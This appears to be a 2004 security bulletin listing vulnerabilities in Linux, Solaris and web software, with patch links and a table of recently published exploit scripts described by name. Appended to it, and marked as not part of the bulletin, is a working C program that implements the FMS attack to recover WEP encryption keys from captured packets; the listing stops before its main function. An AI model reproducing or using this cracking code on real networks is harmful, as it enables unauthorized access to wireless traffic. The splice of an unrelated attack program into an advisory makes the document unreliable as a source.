GNOME VFS Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64; | Multiple vulnerabilities exist in several of the GNOME VFS extfs backend scripts; a malicious user who could influence a user to open a specially-crafted URI using gnome-vfs could perform actions as that user. Users of Red Hat Enterprise Linux should upgrade to these updated packages, which remove these unused scripts. Before applying this update, make sure that all previously-released errata relevant to your system have been applied. Use Red Hat Network to download and update your packages. To launch the Red Hat Update Agent, use the following command: up2date For information on how to install packages manually, refer to the following Web page for the System Administration or Customization guide specific to your system: http://www.redhat.com/docs/manuals/enterprise/ SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ We are not aware of any exploits for this vulnerability. | GNOME VFS updates address extfs vulnerability CVE Name: | High | Red Hat Security Advisory ID: RHSA-2004:373-01, August 4, 2004 SGI Security Advisory, 20040802-01-U, August 14, 2004 |
Gaim 0.10.x, 0.10.3, 0.50-0.75 | Multiple vulnerabilities exist which could let a remote malicious user execute arbitrary code or cause a Denial of Service: a vulnerability exists during the installation of a smiley theme; a heap overflow vulnerability exists when processing data from a groupware server; a buffer overflow vulnerability exists in the URI parsing utility; a buffer overflow vulnerability exists when performing a DNS query to obtain a hostname when signing on to zephyr; a buffer overflow vulnerability exists when processing Rich Text Format (RTF) messages; and a buffer overflow vulnerability exists in the 'content-length' header when an excessive value is submitted. Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-27.xml Rob Flynn: Slackware: ftp://ftp.slackware.com/pub/slackware/slackware-10.0/ We are not aware of any exploits for this vulnerability. | Gaim Multiple Vulnerabilities CVE Names: | Low/High (High if arbitrary code can be executed) | SecurityFocus, August 26, 2004 |
A vulnerability exists in rsync when running in daemon mode with chroot disabled. A remote user may be able to read or write files on the target system that are located outside of the module's path. A remote user can supply a specially crafted path to cause the path cleaning function to generate an absolute filename instead of a relative one. The flaw resides in the sanitize_path() function. Updates and patches are available at: http://rsync.samba.org/ SuSE: http://www.suse.de/de/security/2004_26_rsync.html Debian: http://www.debian.org/security/2004/dsa-538 Trustix: http://www.trustix.net/errata/2004/0042/ Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-17.xml Netwosix: http://www.netwosix.org/adv17.html Mandrake: http://www.mandrakesecure.net/en/ftp.php OpenPKG: ftp://ftp.openpkg.org/release/2.0/UPD/rsync-2.6.0-2.0.2.src.rpm TurboLinux: ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/ We are not aware of any exploits for this vulnerability. | Rsync Input Validation Error in sanitize_path() May Let Remote Users Read or Write Arbitrary Files | High | SecurityTracker 1010940, August 12, 2004 rsync August 2004 Security Advisory OpenPKG Security Advisory, OpenPKG-SA-2004.037, August 15, 2004 Tinysofa Security Advisory, TSSA-2004-020-ES, August 16, 2004 Gentoo Linux Security Advisory GLSA 200408-17, August 17, 2004 Netwosix Linux Security Advisory, LNSA-#2004-0017, August 17, 2004 Mandrakelinux Security Update Advisory, MDKSA-2004:083, August 17, 2004 Fedora Update Notification, Turbolinux Security Advisory, TLSA-2004-20, August 31, 2004 | |
Samba 2.2.11, 3.0.6 | A remote Denial of Service vulnerability exists due to the way print change notify requests are processed. Trustix: http://http.trustix.org/pub/trustix/updates/ We are not aware of any exploits for this vulnerability. | Samba Remote Print Change Notify Remote Denial of Service | Low | Trustix Secure Linux Security Advisory, TSL-2004-0043, August 26, 2004 |
sox.sourceforge.net SoX 12.17.4, 12.17.3, and 12.17.2 | Multiple vulnerabilities exist that could allow a remote malicious user to execute arbitrary code. This is due to boundary errors within the "st_wavstartread()" function when processing ".WAV" file headers and can be exploited to cause stack-based buffer overflows. Successful exploitation requires that a user is tricked into playing a malicious ".WAV" file with a large value in a length field. Fedora: Mandrakesoft: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:076 Gentoo: http://security.gentoo.org/glsa/glsa-200407-23.xml Conectiva: ftp://atualizacoes.conectiva.com.br RedHat: http://rhn.redhat.com/errata/RHSA-2004-409.html Slackware: ftp://ftp.slackware.com/pub/slackware/ SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ Exploit script has been published. | High | Secunia, SA12175, 12176, 12180, July 29, 2004 SecurityTracker Alerts 1010800 and 1010801, July 28/29, 2004 Mandrakesoft Security Advisory MDKSA-2004:076, July 28, 2004 PacketStorm, August 5, 2004 Slackware Security Advisory, SSA:2004-223-03, August 10, 2004 SGI Security Advisory, 20040802-01-U, August 14, 2004 | |
SpamAssassin prior to 2.64 | A Denial of Service vulnerability exists in SpamAssassin. A remote user can send an e-mail message with specially crafted headers to cause a Denial of Service attack against the SpamAssassin service. Update to version 2.64, available at: http://old.spamassassin.org/released/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-06.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php We are not aware of any exploits for this vulnerability. | SpamAssassin Remote Denial of Service | Low | SecurityTracker: 1010903, August 10, 2004 Mandrake Security Advisory, MDKSA-2004:084, August 19, 2004 |
DtMail, Solaris 8.0_x86, 8.0, 9.0_x86, 9.0 | A buffer overflow vulnerability exists in the dtmailer when processing command line arguments, which could let a malicious user execute arbitrary code. Patches available at: http://sunsolve.sun.com/pub-cgi/ We are not aware of any exploits for this vulnerability. | Sun CDE Mailer Buffer Overflow CVE Name: | High | Sun(sm) Alert Notification, 57627, August 23, 2004 US-CERT Vulnerability Note VU#928598, August 25, 2004 |
Solaris 7.0_x86, 7.0, 8.0_x86, 8.0, 9.0_x86, 9.0 | A buffer overflow vulnerability exists in the handling of the 'LOGNAME' environment variable in CDE libDTHelp due to a lack of bounds checking, which could let a malicious user execute arbitrary code. Patches available at: http://sunsolve.sun.com/pub-cgi/ We are not aware of any exploits for this vulnerability. | CDE LibDTHelp LOGNAME Environment Variable Buffer Overflow | High | iDEFENSE Security Advisory, August 25, 2004 |
suPHP 0.3, 0.3.1, 0.5-0.5.2 | A vulnerability exists due to insufficient validation during access control checks prior to executing PHP in a target file, which could let a malicious user obtain elevated privileges. No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | SUPHP Elevated Privileges | Medium | Bugtraq, August 23, 2004 |
Plesk Reloaded 7.1 | A Cross-Site Scripting vulnerability exists in 'login_up.php3' due to insufficient sanitization of the 'login_name' parameter, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Plesk 'Login_name' Parameter Cross-Site Scripting | High | Secunia Advisory, SA12368, August 25, 2004 |
Sympa 3.x, 2.x, 4.0.x, 4.1, 4.1.1 | A vulnerability exists in 'wwsympa/wwsympa.fcgi' when creating new mailing lists, which could let a malicious user bypass authentication. Upgrades available at: There is no exploit code required. | Sympa List Creation Authentication Bypass | Medium | Secunia Advisory, SA12286, August 13, 2004 |
Sympa 4.0.x, 4.1-4.1.2 | A Cross-Site Scripting vulnerability exists in the 'description' field due to insufficient sanitization of user-supplied input data, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Sympa Cross-Site Scripting | High | Securiteam, August 22, 2004 |
WebAPP 0.9.9 | A Directory Traversal vulnerability exists in the 'index.cgi' script due to insufficient sanitization, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | WebAPP Directory Traversal | Medium | SecurityFocus, August 24, 2004 |
xine 0.99.2 | A buffer overflow vulnerability exists in xine in the processing of 'vcd://' protocol identifiers. A remote malicious user can execute arbitrary code on the target system. A remote malicious user can trigger a stack overflow in xine-lib by embedding a specially crafted source identifier within a playlist file, for example. When the target user plays the file, arbitrary code can be executed with the privileges of the target user. A patch is available via CVS at: http://sourceforge.net/mailarchive/forum.php?thread_id=5143955&forum_id=11923 Gentoo: http://security.gentoo.org/glsa/glsa-200408-18.xml A Proof of Concept exploit script has been published. | xine Buffer Overflow in Processing 'vcd' Identifiers Lets Remote Users Execute Arbitrary Code | High | SecurityTracker: 1010895, August 8, 2004 Open security advisory #6, August 8, 2004 Gentoo Linux Security Advisory GLSA 200408-18, August 17, 2004 |
Ruby 1.6, 1.8 | A vulnerability exists in the CGI session management component due to the way temporary files are processed, which could let a malicious user obtain elevated privileges. Upgrades available at: http://security.debian.org/pool/updates/main/r/ruby/ We are not aware of any exploits for this vulnerability. | Ruby CGI Session Management Unsafe Temporary File CVE Name: | Medium | Debian Security Advisory, DSA 537-1, August 16, 2004 |
Multiple Operating Systems - Windows / UNIX / Linux / Other | ||||
Vendor & Software Name | Vulnerability - Impact; Patches - Workarounds; Attack Scripts | Common Name | Risk | Source |
AWStats 5.0-5.9, 6.0-6.2 | An input validation vulnerability exists in the 'awstats.pl' script due to insufficient sanitization, which could let a remote malicious user execute arbitrary commands. No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | AWStats 'awstats.pl' Input Validation | High | SecurityFocus, August 19, 2004 |
Firmware Version 2.40; Axis 2100/2110/2120/2420/2130, Network Camera, 2400/2401 Video Server | Multiple vulnerabilities exist: an input validation vulnerability exists in the '/axis-cgi/io/virtualinput.cgi' script, which could let a remote malicious user execute arbitrary commands; and a Directory Traversal vulnerability exists, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required; however, Proofs of Concept exploits have been published. | Axis Network Camera And Video Server Multiple Vulnerabilities | Medium/High (High if arbitrary commands can be executed) | Bugtraq, August 22, 2004 |
StorPoint CD | A vulnerability exists because a hard-coded administrative backdoor exists, which could let a remote malicious user obtain administrative access. No workaround or patch available at time of publishing. There is no exploit code required; however, Proofs of Concept exploits have been published. | StorPoint CD Administrative Backdoor | High | Bugtraq, August 22, 2004 |
IOS 12.0S, 12.2, 12.3 | A remote Denial of Service vulnerability exists when a malicious user continuously transmits malformed Open Shortest Path First (OSPF) packets. Updates available at: We are not aware of any exploits for this vulnerability. | IOS OSPF Remote Denial of Service | Low | Cisco Security Advisory, 61365, August 21, 2004 US-CERT Vulnerability Note VU#989406 |
IOS R12.x, 12.x | A remote Denial of Service vulnerability exists when a malicious user submits a specially crafted TCP connection to a telnet or reverse telnet port. Potential workarounds available at: We are not aware of any exploits for this vulnerability. | Cisco IOS Telnet Service Remote Denial of Service | Low | Cisco Security Advisory, cisco-sa-20040827, August 27, 2004 US-CERT Vulnerability Note VU#384230 |
WebPac | Input validation vulnerabilities exist due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. There is no exploit code required. | WebPAC Input Validation | High | Bugtraq, August 24, 2004 |
GroupWare 1.0, 1.0.3 | Multiple Cross-Site Scripting vulnerabilities exist in the 'addressbook' and 'calendar' modules and HTML injection vulnerabilities exist in the 'Messenger' and 'Ticket' modules, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | EGroupWare Multiple Input Validation | High | Bugtraq, August 22, 2004 |
Entrust LibKMP ISAKMP Library | A buffer overflow vulnerability exists in the main SA payloads due to insufficient sanity checking, which could let a remote malicious user cause a Denial of Service or execute arbitrary code. Symantec: ftp://ftp.symantec.com/public/updates/ We are not aware of any exploits for this vulnerability. | Entrust LibKmp Library Buffer Overflow CVE Name: CAN-2004-0369 | Low/High (High if arbitrary code can be executed) | Internet Security Systems Protection Advisory, August 26, 2004 |
Hastymail 1.0.1, 1.1 | A vulnerability exists when the 'download' link is invoked due to a failure to return the proper header, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: http://sourceforge.net/project/showfiles.php? There is no exploit code required. | Hastymail Email 'Download' Arbitrary Code | High | Secunia Advisory, SA12358, August 24, 2004 |
Icecast 1.3.10, 1.3.0, 1.3.5-1, 1.3.5, 1.3.7-1, 1.3.7, 1.3.8 | A Cross-Site Scripting vulnerability exists in 'src/http.c' due to insufficient validation of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. Debian: http://security.debian.org/pool/updates/main/i/icecast-server/ There is no exploit code required. | Icecast Cross-Site Scripting CVE Name: CAN-2004-0781 | High | Debian Security Advisory, DSA 541-1, August 24, 2004 |
Mantis 0.19.0a | A vulnerability exists when 'REGISTER_GLOBAL' is enabled, because a remote malicious user can specify the 't_core_dir' variable to cause arbitrary code to be executed. Update available at: http://mantisbt.sourceforge.net/ There is no exploit code required; however, a Proof of Concept exploit has been published. | Mantis 't_core_dir' Variable | High | SecurityTracker Alert ID: 1011015, August 22, 2004 |
Mantis 0.9, 0.9.1, 0.10-0.10.2, 0.11, 0.11.1, 0.12, 0.13, 0.13.1, 0.14-0.14.8, 0.15.0-0.15.12, 0.16.0, 0.16.1, 0.17.0 | Two vulnerabilities exist: a vulnerability exists in 'login_page.php' in the 'return' parameter due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML or script code; and a vulnerability exists in 'signup.php' in the 'email' parameter due to insufficient sanitization, which could let a remote malicious user execute arbitrary script code. Update available at: http://mantisbt.sourceforge.net/ There is no exploit code required; however, a Proof of Concept exploit has been published. | Mantis Cross-Site Scripting & HTML Injection | High | Secunia Advisory, SA12338, August 23, 2004 |
Cute PHP Library (cphplib) 0.42-0.46 | An input validation vulnerability exists in the Cute PHP Library (cphplib) due to insufficient validation of certain parameters, which could let a remote malicious user execute arbitrary HTML code. Upgrade available at: http://www.meindlsoft.com/cphplib_download.php We are not aware of any exploits for this vulnerability. | Cute PHP Library (cphplib) Input Validation | High | SecurityFocus, August 27, 2004 |
Mozilla Organization Mozilla 1.7 and prior; | Multiple vulnerabilities exist in Mozilla, Firefox, and Thunderbird that could allow a malicious user to conduct spoofing attacks, compromise a vulnerable system, or cause a Denial of Service. These vulnerabilities include buffer overflow, input verification, insecure certificate name matching, and out-of-bounds reads. Upgrade to the latest version of Mozilla, Firefox, or Thunderbird available at: http://www.mozilla.org/download.html Mandrakesoft: RedHat: http://rhn.redhat.com/errata/RHSA-2004-421.html SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ We are not aware of any exploits for this vulnerability. | Mozilla Multiple Vulnerabilities CVE Name: CAN-2004-0757 | High | Secunia, SA10856, August 4, 2004 US-CERT Vulnerability Note VU#561022 RedHat Security Advisory, RHSA-2004:421-17, August 4, 2004 SGI Security Advisory, 20040802-01-U, August 14, 2004 |
HP HP-UX B.11.23, 11.11, 11.00; | A buffer overflow vulnerability exists in the Netscape Network Security Services (NSS) library suite due to insufficient boundary checks, which could let a remote malicious user execute arbitrary code. Mozilla: ftp://ftp.mozilla.org/pub/mozilla.org/security/nss/releases/NSS_3_9_2_RTM/ We are not aware of any exploits for this vulnerability. | NSS Buffer Overflow | High | Internet Security Systems Advisory, August 23, 2004 |
NR041 1.2 Release 03 | A vulnerability exists in the DHCP daemon due to insufficient sanitization of user-supplied input that is passed with the 'DHCP HOSTNAME' option, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required. | Network Everywhere Router Remote Script Injection | High | Secunia Advisory, SA12393, August 27, 2004 |
iChain Server 2.3 | Multiple vulnerabilities exist: a vulnerability exists due to insufficient validation of overly long UTF-8 encodings, which could let a remote malicious user bypass access control rules; a vulnerability exists due to insufficient sanitization of user-supplied input passed to the web server, which could let a remote malicious user execute arbitrary HTML and script code; a remote Denial of Service vulnerability exists when a remote malicious user submits a specially crafted URL; a vulnerability exists in the 'VIA' header, which could let a remote malicious user obtain sensitive information; and a vulnerability exists due to the insecure transmission of password and username credentials, which could let a remote malicious user obtain sensitive information. Patch available at: http://support.novell.com/servlet/filedownload/sec/ftf/b1ic23sp1.exe There is no exploit code required. | iChain Multiple Unspecified Remote Vulnerabilities | Low/Medium/High (Low if a DoS; Medium if sensitive information can be obtained; and High if arbitrary code can be executed) | Technical Information Document, TID2969621, August 24, 2004 |
Opera Web Browser 7.52, 7.53 | A vulnerability exists in IFRAME, which could let a malicious user obtain sensitive information. Upgrades available at: http://www.opera.com/download/ Proof of Concept exploit has been published. | Opera Web Browser Resource Detection | Medium | GreyMagic Security Advisory GM#009-OP, August 17, 2004 |
PhotoADay | A Cross-Site Scripting vulnerability exists in the 'PhotoADay' PHP-Nuke module due to insufficient sanitization of user-supplied URI input, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PhotoADay Pad_selected Parameter Cross-Site Scripting | High | SecurityTracker Alert ID, 1011027, August 23, 2004 |
PForum 1.24, 1.25 | A Cross-Site Scripting vulnerability exists due to insufficient sanitization of the 'IRC Server' and 'AIM ID' fields, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: There is no exploit code required; however, a Proof of Concept exploit has been published. | PScript PForum Cross-Site Scripting | High | Bugtraq, August 14, 2004 US-CERT Vulnerability Note VU#674542, August 18, 2004 |
PvPGN 1.6.0-1.6.3 | A vulnerability exists in the 'passhash' attribute, which could let a remote malicious user obtain authentication information. Upgrades available at: We are not aware of any exploits for this vulnerability. | PvPGN Information Disclosure | Medium | PvPGN Security Advisory, PSA-20040823, August 23, 2004 |
TikiWiki 1.8-1.8.3 | Two vulnerabilities exist: a vulnerability exists because individual wiki page permissions can be bypassed, which could let a remote malicious user obtain unauthorized access; and a vulnerability exists in 'smarty_tiki' which could let a remote malicious user obtain sensitive information. Upgrades available at: There is no exploit code required. | TikiWiki Unauthorized Access & Information Disclosure | Medium | SecurityTracker Alert ID: 1010962, August 17, 2004 |
TopLayer Attack Mitigator 5500 3.11.008 | A remote Denial of Service vulnerability exists when a malicious user submits a high volume of HTTP traffic. Update available at: http://www.toplayer.com/content/support/tech_assist/index.jsp There is no exploit code required. | Top Layer Attack Mitigator IPS 5500 Remote Denial of Service | Low | IRM Security Advisory No. 010, August 25, 2004 |
Xephyrus Java Simple Template Engine (JST) 0.9, 1.0, 1.1, 2.0, 2.1 (limited distro), 3.0 (public distro) | A Directory Traversal vulnerability exists because 'file-token' values may be overridden by URI parameters, which could let a malicious user obtain sensitive information. Upgrades available at: http://www.xephyrus.com/jest/ There is no exploit code required. | Xephyrus Java Simple Template Directory Traversal | Medium | Security Advisory JST-001, August 16, 2004 |
JShop E-Commerce, Professional v3, JShop Server | A Cross-Site Scripting vulnerability exists in the 'page.php' script due to insufficient filtering of user-supplied input in the 'xPage' parameter, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | E-Commerce Suite Page.PHP Cross-Site Scripting | High | Indonesia Security Development Team Advisory, August 22, 2004 |
Recent Exploit Scripts/Techniques
The table below contains a sample of exploit scripts and "how to" guides identified during this period. Items listed in boldface/red (if any) are attack scripts/techniques for which vendors, security vulnerability listservs, or Computer Emergency Response Teams (CERTs) have not published workarounds or patches, or which represent scripts that malicious users are utilizing.
Note: At times, scripts/techniques may contain names or content that may be considered offensive.
Date of Script | Script name | Workaround or Patch Available | Script Description |
August 31, 2004 | dlinkdown.c | No | Remote exploit that will change an IP address for the D-Link DCS-900 IP camera, due to the fact that it listens for a 62976/udp broadcast packet telling it what IP address to use without any authentication. |
August 31, 2004 | gc2boom.zip | No | Proof of concept exploit for the denial of service vulnerability in Ground Control II: Operation Exodus versions 1.0.0.7 and below. |
August 31, 2004 | gwee-1.36.tar.gz | N/A | Generic Web Exploitation Engine (gwee), is a small program designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose. |
August 31, 2004 | keeneTraversal102.txt | No | Proof of concept exploit for Keene Digital Media Server version 1.0.2, which is susceptible to a directory traversal attack due to an input validation vulnerability. |
August 31, 2004 | neb-citadel.c | Yes | Remote exploit for Citadel/UX versions 6.23 and below that makes use of the USER directive overflow vulnerability. |
August 31, 2004 | skl0g_v1.14.zip | N/A | skl0g is a keylogger for Windows. It runs invisibly, logs everything that is typed at the computer and saves them in log files according to the date. |
August 31, 2004 | tcpick-0.1.24.tar.gz | N/A | tcpick is a textmode sniffer that can track TCP streams and saves the data captured in files or displays them in the terminal. |
August 31, 2004 | weplab-0.1.0-beta.tar.gz weplab-0.1.0-beta-win32_01.zip | N/A | Weplab is a tool to review the security of WEP encryption in wireless networks. Several attacks are available to help measure the effectiveness and minimum requirements for the network. |
August 27, 2004 | aircrack-1.3.tgz | N/A | Aircrack is an 802.11 WEP cracking program that can recover a 40-bit or 104-bit WEP key once enough encrypted packets have been gathered. It implements the standard FMS attack along with some optimizations, thus making the attack much faster compared to other WEP cracking tools. |
August 27, 2004 | Codebase.gen | No | Code that exploits the Winamp skin remote code execution vulnerability. |
August 27, 2004 | gaucho140poc.cpp.txt | Yes | Proof of concept exploit that simulates a POP3 server which sends a specially crafted email to a vulnerable Gaucho email client, triggering an overflow and binding a shell on port 2001. Version 1.4 build 145 is susceptible. |
August 27, 2004 | winampExploit.txt | No | Proof of concept exploit that was found in the wild by k-otik.com that makes use of the Winamp vulnerability where insufficient restrictions on Winamp skin zip files (.wsz) allow a malicious attacker to place and execute arbitrary programs on a victim's system. |
August 26, 2004 | 00045-08242004.txt | No | Proof of concept exploit for the denial of service and unauthorized system access vulnerabilities in Easy File Sharing webserver version 1.25. |
August 26, 2004 | efswsdos.pl | No | Proof of concept exploit for the denial of service vulnerability in Easy File Sharing webserver version 1.25. |
August 26, 2004 | gallery-php.txt | Yes | PHP based exploit for Gallery versions 1.4.4 and below that makes use of an arbitrary file upload flaw. |
August 26, 2004 | gc2.tar | No | Proof of Concept exploit for the Ground Control II Remote Denial of Service vulnerability. |
August 26, 2004 | gmailSurf.txt | Yes | Proof of concept exploit for an input validation vulnerability in Google's GMail system that allows users to surf anonymously. |
August 26, 2004 | md-xplv2.c | No | Script that exploits the Music Daemon Information Disclosure vulnerability. |
August 26, 2004 | networkEverywhere.txt | No | Proof of concept exploit for the script injection over DHCP vulnerability in NetworkEverywhere router Model NR041. |
August 26, 2004 | painkex.zip | No | Proof of concept exploit for Painkiller versions 1.3.1 and below that makes use of a memory corruption flaw. |
August 26, 2004 | PST_chpasswd_exp-v_b.c | Yes | Squirrelmail chpasswd local root bruteforce exploit. |
August 26, 2004 | RealVNC_dos.c | No | Proof of Concept exploit for the RealVNC Server Remote Denial of Service vulnerability. |
August 26, 2004 | webapp.traversal.txt | No | Proof of concept exploit for the WebAPP vulnerabilities that could permit a directory traversal attack and retrieval of the administrator's DES-encrypted password hash. |
August 25, 2004 | find_shell code | N/A | This shellcode scans the address space of the vulnerable process for a certain pattern and, once it is found, jumps into it. It is meant for the case where a remote buffer overflow target has limited buffer space, so storing the bind shellcode in the overflowed buffer is difficult but storing it "somewhere" else in the process is possible. |
August 24, 2004 | 00042-08202004.txt | No | Proof of concept exploit for the BadBlue Webserver version 2.5 Denial of Service vulnerability. |
August 24, 2004 | AntiExploit-1.3b2.tar.gz | N/A | AntiExploit is an exploit scanner to detect local intruders. It scans for over 3900 suspicious files, has daily database updates, and will act if a file is accessed. It uses the dazuko kernel module, which is also used by clamAV, Amavis, and other virus scanners. |
August 24, 2004 | axisFlaws.txt | No | Proof of concept exploit for multiple vulnerabilities in Axis versions 2100, 2110, 2120, 2420, and 2130 Network Camera along with the 2400 and 2401 Video Servers. |
August 24, 2004 | hafiye.txt | No | Proof of concept exploit for Hafiye 1.0 terminal escape sequence injection vulnerability that can result in a denial of service and remote root compromise. |
August 24, 2004 | musicDaemon.txt | No | Proof of concept exploit for the MusicDaemon versions 0.0.3 and prior remote Denial of Service and other vulnerabilities. |
August 24, 2004 | MyDMS.txt | Yes | Proof of concept exploit for the MyDMS SQL injection and directory traversal vulnerabilities. |
August 24, 2004 | qt_bmp_heap_overflow.c | Yes | Proof of concept exploit for the qt BMP parsing vulnerability in version 3.3.2. |
August 24, 2004 | qt_bmpslap.c | Yes | Heap overflow exploit for the qt BMP parsing vulnerability in version 3.3.2. |
August 24, 2004 | regmon_dos.c | No | A Proof of Concept exploit script for the Regmon Local Denial of Service vulnerability. |
August 24, 2004 | txt-rant.txt | N/A | Information about how Microsoft Windows and virus scanners fail to pay proper attention to the .txt file extension, and how attackers can use this to blend into the background. |
August 23, 2004 | birdCahtDOSExploit.java | No | Exploit for the Bird Chat Remote Denial of Service vulnerability. |
August 20, 2004 | badblue_webserver_dos.pl | No | Proof of Concept exploit for the BadBlue Webserver Denial Of Service vulnerability. |
August 20, 2004 | xv_bmpslap.c | No | Script that exploits the xv xvbmp.c buffer overflow vulnerability. |
August 19, 2004 | malware.sp2.zip | No | Exploit for the Internet Explorer MHTML Content-Location Cross Security Domain Scripting vulnerability. |
August 19, 2004 | malware.sp2.zip | Yes | Exploit for the Internet Explorer MHTML Content-Location Cross Security Domain Scripting vulnerability. |
August 19, 2004 | merak527.txt | Yes | Script that exploits various vulnerabilities in the Merak Webmail server version 5.2.7. |
August 19, 2004 | rkhunter-1.1.6.tar.gz | N/A | Rootkit Hunter scans files and systems for known and unknown rootkits, backdoors, and sniffers. The package contains one shell script, a few text-based databases, and optional Perl modules. It should run on almost every Unix variety except Solaris and NetBSD. |
August 19, 2004 | yapig-php.txt | No | PHP based exploit script for YaPiG 0.x. |
August 18, 2004 | gv-exploitv2.c | Yes | Script that exploits the local buffer overflow vulnerability in the gv postscript viewer. |
August 18, 2004 | Imailpwdump.cpp | Yes | Password decryption utility for the Ipswitch IMail Server versions 8.1 and prior. |
August 18, 2004 | ipd-dos.c | Yes | Proof of concept exploit for the IPD (Integrity Protection Driver) Denial of Service vulnerability. |
August 18, 2004 | playsms_sql.pl | No | Proof of Concept exploit for the PlaySMS SQL Input Validation vulnerability. |
August 17, 2004 | dnsspoof.zip | Yes | Utility that automates exploitation of the DNS spoofing vulnerability in Microsoft Windows XP SP1. It generates a script file that launches the netwox application with the correct parameters. It works on Windows and Linux. |
August 17, 2004 | xine_bof.c | Yes | Script that exploits the xine buffer overflow in the processing of 'vcd' identifiers, which lets remote users execute arbitrary code. |
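The aircrack entry in the table above names the FMS attack without saying how it works. The following C program is an added illustration, not aircrack's code and not part of the bulletin. It implements the attack end to end on a constructed capture: RC4 as WEP uses it (the 3-byte IV prepended to the secret key), the "resolved state" test and vote that recover each key byte in turn from packets with weak IVs, and the candidate ranking with a fudge factor plus final verification that a real cracker needs because only about one weak-IV packet in twenty votes for the right value. The WEP-40 key, the set of weak IVs (B+3, 255, X) for every key byte position and the 0xAA known-plaintext assumption (the LLC/SNAP DSAP byte that starts every 802.11 data frame) are all assumptions of the demo; the attacker side of the code sees only the IVs and the first ciphertext byte of each frame.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IV_LEN 3
#define KEY_LEN 5                       /* WEP-40: five secret key bytes */
#define RC4_KEY_LEN (IV_LEN + KEY_LEN)
#define SNAP_DSAP 0xAA                  /* first plaintext byte of every 802.11 data frame */
#define FUDGE 8                         /* ranked candidates tried per key byte */
struct packet { uint8_t iv[IV_LEN]; uint8_t ct0; };  /* IV and first ciphertext byte */

/* Full RC4 KSA over iv||key, then one PRGA step: returns the first keystream byte. */
static uint8_t rc4_first_byte(const uint8_t *K)
{
    uint8_t S[256], j = 0, t;
    for (int i = 0; i < 256; i++) S[i] = (uint8_t)i;
    for (int i = 0; i < 256; i++) {
        j = (uint8_t)(j + S[i] + K[i % RC4_KEY_LEN]);
        t = S[i]; S[i] = S[j]; S[j] = t;
    }
    j = S[1];                           /* PRGA: i = 1, j = S[1] */
    t = S[1]; S[1] = S[j]; S[j] = t;
    return S[(uint8_t)(S[1] + S[j])];
}

/* FMS vote for key byte B given bytes 0..B-1: run the first x = B+3 KSA steps; if the
 * state is "resolved" (S[1] < x and S[1]+S[S[1]] == x) the first keystream byte equals
 * S[x] with probability about e^-3, and S[x] is the value swapped in at step x, so
 * K[x] = j_x - j_{x-1} - S[x].  Wrong votes are spread roughly evenly over 256 values. */
static void fms_vote(const struct packet *pk, size_t n, const uint8_t *known,
                     int B, unsigned votes[256])
{
    int x = B + IV_LEN;
    memset(votes, 0, 256 * sizeof votes[0]);
    for (size_t p = 0; p < n; p++) {
        uint8_t K[RC4_KEY_LEN], S[256], j = 0, t;
        memcpy(K, pk[p].iv, IV_LEN);
        memcpy(K + IV_LEN, known, (size_t)B);
        for (int i = 0; i < 256; i++) S[i] = (uint8_t)i;
        for (int i = 0; i < x; i++) {
            j = (uint8_t)(j + S[i] + K[i]);
            t = S[i]; S[i] = S[j]; S[j] = t;
        }
        if (S[1] >= x || (uint8_t)(S[1] + S[S[1]]) != x) continue;
        uint8_t ks0 = pk[p].ct0 ^ SNAP_DSAP;  /* known plaintext gives keystream byte 0 */
        int idx = 0; while (S[idx] != ks0) idx++;   /* S is a permutation: always found */
        votes[(uint8_t)(idx - j - S[x])]++;
    }
}

/* Depth-first search over ranked candidates; a full key is accepted only if it
 * reproduces the first keystream byte of every captured packet. */
static int fms_search(const struct packet *pk, size_t n, uint8_t *key, int B)
{
    if (B == KEY_LEN) {
        uint8_t K[RC4_KEY_LEN];
        memcpy(K + IV_LEN, key, KEY_LEN);
        for (size_t p = 0; p < n; p++) {
            memcpy(K, pk[p].iv, IV_LEN);
            if (rc4_first_byte(K) != (pk[p].ct0 ^ SNAP_DSAP)) return 0;
        }
        return 1;
    }
    unsigned votes[256];
    fms_vote(pk, n, key, B, votes);
    for (int rank = 0; rank < FUDGE; rank++) {
        int best = 0;
        for (int v = 1; v < 256; v++) if (votes[v] > votes[best]) best = v;
        if (votes[best] == 0) break;
        key[B] = (uint8_t)best;
        if (fms_search(pk, n, key, B + 1)) return 1;
        votes[best] = 0;                      /* drop it and try the next candidate */
    }
    return 0;
}

/* Constructed for the demo: the victim's key, unknown to the attacker side above. */
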